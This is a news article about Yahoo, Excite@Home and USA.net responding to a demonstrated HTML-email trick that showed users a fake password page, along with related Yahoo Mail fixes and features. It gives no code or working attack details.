Yahoo, others move to defuse email password-stealing threat
Free email Web sites are scrambling to protect account holders from an exploit that could trick them into handing over their passwords.
Yahoo, Excite@Home and USA.net moved today to implement safeguards against the password-stealing exploit, in which a malicious email sender can lead account holders to a bogus but convincing password-entry screen.
"We took a look at it and started immediately to implement something that would make it clearer to users when they are or are not at the Yahoo site," said Lisa Pollock, senior producer for Yahoo Mail. "Our engineers are working on it right now."
The exploit, demonstrated and described by security enthusiast Bennett Haselton, head of anti-filtering organization Peacefire.org, is the latest in a string of password-thieving schemes set up by bug hunters to demonstrate the hazards of HTML messages that can mimic the legitimate password-collection mechanisms of Web-based email sites.
Microsoft's Hotmail, with more than 50 million accounts, has grappled with the problem numerous times, most recently last month.
Because it is presumed to be the Web's largest provider of free email, Hotmail gets pounded the hardest by bug hunters. But thanks to measures implemented in the past to secure the Hotmail service against similar exploits, this latest scheme is ineffective against Hotmail and Mail.com, which licenses its service to Snap.com and other portals.
USA.net and Excite@Home acknowledged that their free email services were vulnerable and said they were in the process of implementing fixes.
Hotmail and its competitors have applied drastic measures to foil password-stealing exploits. These measures have included blocking all use of JavaScript and other scripting languages in incoming HTML messages, and in Hotmail's case, forcing all HTML links to open in a new window framed by a Hotmail warning.
Yahoo does send incoming links to new browser windows. But the password-stealing exploit takes advantage of the fact that Yahoo and the other vulnerable Web emailers do not do the same for HTML forms.
In a demonstration shown to email providers and reporters, Haselton hid the real Yahoo Mail taskbar and created a bogus version at the bottom of an email message. Email recipients clicking "Reply" or "Delete" were presented with a password-entry page telling them their sessions had timed out.
Yahoo said it would make it clearer to account holders whether they are in the Yahoo Mail site but noted that people still need to exercise caution when handing over their passwords.
"We can't be 100 percent sure that every user will interpret it the way we anticipate," Pollock said.
Pollock recommended that account holders always look at the Web address (URL) of a page asking for a password and that they change passwords regularly.
Yahoo said it patched another Yahoo Mail glitch, this one with its spam-filtering service. The spam filter, implemented late last year, sends unsolicited commercial email to a bulk email folder separate from the in-box.
"We were trying to make some quality improvements Thursday afternoon, and a bug slipped through that let more spam into the in-box," said Matt Lewin, whose title is "technical Yahoo." Lewin said the bug was fixed yesterday.
In other Yahoo Mail news, the site has introduced new customization features that let people determine the color and other "look and feel" elements of their accounts. Those changes can be made under "Preferences," which is found under "Options" on the Yahoo Mail front page.